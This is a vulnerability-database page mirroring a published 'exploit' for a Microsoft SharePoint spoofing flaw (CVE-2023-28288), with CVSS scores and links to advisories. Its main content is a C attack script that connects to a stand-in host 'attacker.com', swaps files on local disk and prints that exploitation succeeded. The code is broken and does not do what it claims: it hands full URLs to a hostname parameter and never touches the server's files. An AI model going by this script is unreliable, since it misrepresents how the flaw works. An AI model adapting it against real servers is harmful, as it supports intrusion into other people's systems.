Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormAmirhossein BahramizadehPACKETSTORM:173126
HistoryJun 27, 2023 - 12:00 a.m.

Microsoft SharePoint Enterprise Server 2016 Spoofing

2023-06-2700:00:00
Amirhossein Bahramizadeh
packetstormsecurity.com
120

8.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

5.5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:P/A:N

0.001 Low

EPSS

Percentile

40.5%

JSON
`// Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing  
// Date: 2023-06-20  
// country: Iran  
// Exploit Author: Amirhossein Bahramizadeh  
// Category : Remote  
// Vendor Homepage:  
// Microsoft SharePoint Foundation 2013 Service Pack 1  
// Microsoft SharePoint Server Subscription Edition  
// Microsoft SharePoint Enterprise Server 2013 Service Pack 1  
// Microsoft SharePoint Server 2019  
// Microsoft SharePoint Enterprise Server 2016  
// Tested on: Windows/Linux  
// CVE : CVE-2023-28288  
  
#include <windows.h>  
#include <stdio.h>  
  
  
// The vulnerable SharePoint server URL  
const char *server_url = "http://example.com/";  
  
// The URL of the fake SharePoint server  
const char *fake_url = "http://attacker.com/";  
  
// The vulnerable SharePoint server file name  
const char *file_name = "vuln_file.aspx";  
  
// The fake SharePoint server file name  
const char *fake_file_name = "fake_file.aspx";  
  
int main()  
{  
HANDLE file;  
DWORD bytes_written;  
char file_contents[1024];  
  
// Create the fake file contents  
sprintf(file_contents, "<html><head></head><body><p>This is a fake file.</p></body></html>");  
  
// Write the fake file to disk  
file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);  
if (file == INVALID_HANDLE_VALUE)  
{  
printf("Error creating fake file: %d\n", GetLastError());  
return 1;  
}  
if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL))  
{  
printf("Error writing fake file: %d\n", GetLastError());  
CloseHandle(file);  
return 1;  
}  
CloseHandle(file);  
  
// Send a request to the vulnerable SharePoint server to download the file  
sprintf(file_contents, "%s%s", server_url, file_name);  
file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);  
if (file == INVALID_HANDLE_VALUE)  
{  
printf("Error creating vulnerable file: %d\n", GetLastError());  
return 1;  
}  
if (!InternetReadFileUrl(file_contents, file))  
{  
printf("Error downloading vulnerable file: %d\n", GetLastError());  
CloseHandle(file);  
return 1;  
}  
CloseHandle(file);  
  
// Replace the vulnerable file with the fake file  
if (!DeleteFile(file_name))  
{  
printf("Error deleting vulnerable file: %d\n", GetLastError());  
return 1;  
}  
if (!MoveFile(fake_file_name, file_name))  
{  
printf("Error replacing vulnerable file: %d\n", GetLastError());  
return 1;  
}  
  
// Send a request to the vulnerable SharePoint server to trigger the vulnerability  
sprintf(file_contents, "%s%s", server_url, file_name);  
if (!InternetReadFileUrl(file_contents, NULL))  
{  
printf("Error triggering vulnerability: %d\n", GetLastError());  
return 1;  
}  
  
// Print a message indicating that the vulnerability has been exploited  
printf("Vulnerability exploited successfully.\n");  
  
return 0;  
}  
  
BOOL InternetReadFileUrl(const char *url, HANDLE file)  
{  
HINTERNET internet, connection, request;  
DWORD bytes_read;  
char buffer[1024];  
  
// Open an Internet connection  
internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);  
if (internet == NULL)  
{  
return FALSE;  
}  
  
// Connect to the server  
connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);  
if (connection == NULL)  
{  
InternetCloseHandle(internet);  
return FALSE;  
}  
  
// Send the HTTP request  
request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0);  
if (request == NULL)  
{  
InternetCloseHandle(connection);  
InternetCloseHandle(internet);  
return FALSE;  
}  
if (!HttpSendRequest(request, NULL, 0, NULL, 0))  
{  
InternetCloseHandle(request);  
InternetCloseHandle(connection);  
InternetCloseHandle(internet);  
return FALSE;  
}  
  
// Read the response data  
while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0)  
{  
if (file != NULL)  
{  
// Write the data to disk  
if (!WriteFile(file, buffer, bytes_read, &bytes_read, NULL))  
{  
InternetCloseHandle(request);  
InternetCloseHandle(connection);  
InternetCloseHandle(internet);  
return FALSE;  
}  
}  
}  
  
InternetCloseHandle(request);  
InternetCloseHandle(connection);  
InternetCloseHandle(internet);  
return TRUE;  
}  
  
  
`

Related

mscve 1
mskb 5
nessus 5
cvelist 1
cnvd 1
prion 1
cve 1
zdi 1
zdt 1
exploitdb 1
kaspersky 1
rapid7blog 1
mscve
mscve
Microsoft SharePoint Server Spoofing Vulnerability
2023-04-11 07:00:00
mskb
mskb
Description of the security update for SharePoint Foundation 2013: April 11, 2023 (KB5002383)
2023-04-11 07:00:00
April 11, 2023, cumulative update for SharePoint Enterprise Server 2013 (KB5002381)
2023-04-11 07:00:00
Description of the security update for SharePoint Enterprise Server 2016: April 11, 2023 (KB5002385)
2023-04-11 07:00:00
nessus
nessus
Security Updates for Microsoft SharePoint Server Subscription Edition (March 2023)
2023-04-11 00:00:00
Security Updates for Microsoft SharePoint Server 2019 (April 2023)
2023-04-11 00:00:00
Security Updates for Microsoft SharePoint Foundation 2013 (March 2023)
2023-04-11 00:00:00
cvelist
cvelist
Microsoft SharePoint Server Spoofing Vulnerability
2023-04-11 19:13:18
cnvd
cnvd
Microsoft SharePoint Server Spoofing Vulnerability (CNVD-2023-72199)
2023-04-13 00:00:00
prion
prion
Spoofing
2023-04-11 21:15:00
cve
cve
CVE-2023-28288
2023-04-11 21:15:27
zdi
zdi
Microsoft SharePoint WSSXmlUrlResolver Server-Side Request Forgery Vulnerability
2023-04-11 00:00:00
zdt
zdt
Microsoft SharePoint Enterprise Server 2016 - Spoofing Exploit
2023-06-26 00:00:00
exploitdb
exploitdb
Microsoft SharePoint Enterprise Server 2016 - Spoofing
2023-06-26 00:00:00
kaspersky
kaspersky
KLA48823 Multiple vulnerabilities in Microsoft Office
2023-04-11 00:00:00
rapid7blog
rapid7blog
Patch Tuesday - April 2023
2023-04-11 22:49:56

8.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

5.5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:P/A:N

0.001 Low

EPSS

Percentile

40.5%

JSON
Related for PACKETSTORM:173126
mscve1mskb5nessus5cvelist1cnvd1prion1cve1zdi1zdt1exploitdb1kaspersky1rapid7blog1